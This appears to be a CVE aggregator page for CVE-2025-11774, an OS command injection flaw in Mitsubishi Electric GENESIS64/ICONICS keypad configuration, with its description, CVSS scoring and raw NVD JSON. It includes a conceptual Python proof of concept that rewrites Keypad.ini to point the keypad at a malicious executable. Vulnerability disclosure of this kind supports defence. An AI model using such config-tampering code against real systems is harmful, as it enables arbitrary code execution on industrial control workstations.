Security Vulnerability Report
中文
CVE-2025-11774 CVSS 8.2 HIGH

CVE-2025-11774

Published: 2025-12-19 01:16:05
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the software keyboard function (hereinafter referred to as "keypad function") of Mitsubishi Electric GENESIS64 versions 10.97.2 CFR3 and prior, Mitsubishi Electric Iconics Digital Solutions GENESIS64 versions 10.97.2 CFR3 and prior, Mitsubishi Electric ICONICS Suite versions 10.97.2 CFR3 and prior, Mitsubishi Electric Iconics Digital Solutions ICONICS Suite versions 10.97.2 CFR3 and prior, Mitsubishi Electric MobileHMI versions 10.97.2 CFR3 and prior, Mitsubishi Electric Iconics Digital Solutions MobileHMI versions 10.97.2 CFR3 and prior, and Mitsubishi Electric MC Works64 all versions allows a local attacker to execute arbitrary executable files (EXE) when a legitimate user uses the keypad function by tampering with the configuration file for the function. This could allow the attacker to disclose, tamper with, delete, or destroy information stored on the PC where the affected product is installed, or cause a denial-of-service (DoS) condition on the system, through the execution of the EXE.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Mitsubishi Electric GENESIS64 < 10.97.2 CFR3
Mitsubishi Electric Iconics Digital Solutions GENESIS64 < 10.97.2 CFR3
Mitsubishi Electric ICONICS Suite < 10.97.2 CFR3
Mitsubishi Electric Iconics Digital Solutions ICONICS Suite < 10.97.2 CFR3
Mitsubishi Electric MobileHMI < 10.97.2 CFR3
Mitsubishi Electric Iconics Digital Solutions MobileHMI < 10.97.2 CFR3
Mitsubishi Electric MC Works64 所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11774 PoC Concept # OS Command Injection in Mitsubishi Electric GENESIS64 Keypad Function # Note: This is a conceptual PoC for educational purposes only import os import shutil # Target configuration file path (typical location) config_path = r'C:\Program Files\Mitsubishi Electric\GENESIS64\Config\Keypad.ini' backup_path = config_path + '.bak' def create_malicious_exe(): """Create a simple malicious executable for demonstration""" malicious_exe = r'C:\Windows\Temp\malicious.exe' # In real scenario, this would be actual malware return malicious_exe def exploit_cve_2025_11774(): """ Exploitation steps: 1. Backup original configuration file 2. Modify the Keypad.ini to reference malicious executable 3. Wait for legitimate user to use keypad function 4. Malicious code executes with user privileges """ try: # Step 1: Backup original config if os.path.exists(config_path): shutil.copy(config_path, backup_path) print(f'[+] Backed up original config to {backup_path}') # Step 2: Read and modify config with open(config_path, 'r', encoding='utf-8') as f: content = f.read() malicious_exe = create_malicious_exe() # Step 3: Inject malicious command reference # This is a simplified example - actual exploitation requires # understanding the specific config format and injection point modified_content = content.replace( 'ExecutablePath=C:\\Windows\\System32\\osk.exe', f'ExecutablePath={malicious_exe}' ) # Step 4: Write modified config with open(config_path, 'w', encoding='utf-8') as f: f.write(modified_content) print('[+] Configuration file tampered') print(f'[+] Malicious executable path injected: {malicious_exe}') print('[!] Wait for user to use keypad function to trigger execution') except Exception as e: print(f'[-] Error: {e}') # Restore backup if error occurs if os.path.exists(backup_path): shutil.copy(backup_path, config_path) print('[+] Restored original configuration') if __name__ == '__main__': print('CVE-2025-11774 Exploitation Concept') print('Author: Security Research') print('Note: Only for authorized testing') exploit_cve_2025_11774()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11774", "sourceIdentifier": "[email protected]", "published": "2025-12-19T01:16:04.570", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the software keyboard function (hereinafter referred to as \"keypad function\") of Mitsubishi Electric GENESIS64 versions 10.97.2 CFR3 and prior, Mitsubishi Electric Iconics Digital Solutions GENESIS64 versions 10.97.2 CFR3 and prior, Mitsubishi Electric ICONICS Suite versions 10.97.2 CFR3 and prior, Mitsubishi Electric Iconics Digital Solutions ICONICS Suite versions 10.97.2 CFR3 and prior, Mitsubishi Electric MobileHMI versions 10.97.2 CFR3 and prior, Mitsubishi Electric Iconics Digital Solutions MobileHMI versions 10.97.2 CFR3 and prior, and Mitsubishi Electric MC Works64 all versions allows a local attacker to execute arbitrary executable files (EXE) when a legitimate user uses the keypad function by tampering with the configuration file for the function. This could allow the attacker to disclose, tamper with, delete, or destroy information stored on the PC where the affected product is installed, or cause a denial-of-service (DoS) condition on the system, through the execution of the EXE."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.5, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://jvn.jp/vu/JVNVU97729686/", "source": "[email protected]"}, {"url": "https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-018_en.pdf", "source": "[email protected]"}]}}